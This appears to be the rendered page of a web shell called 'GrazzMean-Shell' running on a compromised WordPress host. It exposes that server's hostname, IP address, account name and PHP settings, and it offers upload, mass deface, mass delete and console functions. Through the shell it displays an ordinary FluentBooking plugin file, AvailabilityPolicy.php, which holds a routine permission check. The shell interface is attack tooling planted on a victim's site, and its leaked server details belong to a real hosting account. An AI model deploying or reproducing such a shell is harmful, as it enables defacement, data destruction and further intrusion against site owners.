shell bypass 403

GrazzMean-Shell Shell

: /home/d/r/e/dreampi/www/wp-content/plugins/fluent-booking/app/Http/Policies/ [ drwxr-xr-x ]
Uname: Linux webm012.cluster130.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Software: Apache
PHP version: 8.0.30 [ PHP INFO ] PHP os: Linux
Server Ip: 145.239.37.162
Your Ip: 216.73.216.190
User: dreampi (1009562) | Group: users (100)
Safe Mode: OFF
Disable Function:
_dyuweyrj4,_dyuweyrj4r,dl
upload mass deface mass delete console

name : AvailabilityPolicy.php 
<?php

namespace FluentBooking\App\Http\Policies;

use FluentBooking\App\Services\PermissionManager;
use FluentBooking\Framework\Http\Request\Request;
use FluentBooking\Framework\Foundation\Policy;

class AvailabilityPolicy extends Policy
{
    /**
     * Check user permission for any method
     * @param \FluentBooking\Framework\Http\Request\Request; $request
     * @return Boolean
     */
    public function verifyRequest(Request $request)
    {
        if (current_user_can('manage_options') || PermissionManager::userCan('manage_other_availabilities')) {
            return true;
        }

        if ($request->method() == 'GET' && PermissionManager::userCan('read_and_use_other_availabilities')) {
            return true;
        }

        if ($request->schedule_id) {
            $availability = \FluentBooking\App\Models\Availability::find($request->schedule_id);
            
            if (!$availability) {
                return false;
            }

            return (int)$availability->object_id === get_current_user_id();
        }

        return PermissionManager::userCan('manage_own_calendar');
    }
}
© 2026 GrazzMean-Shell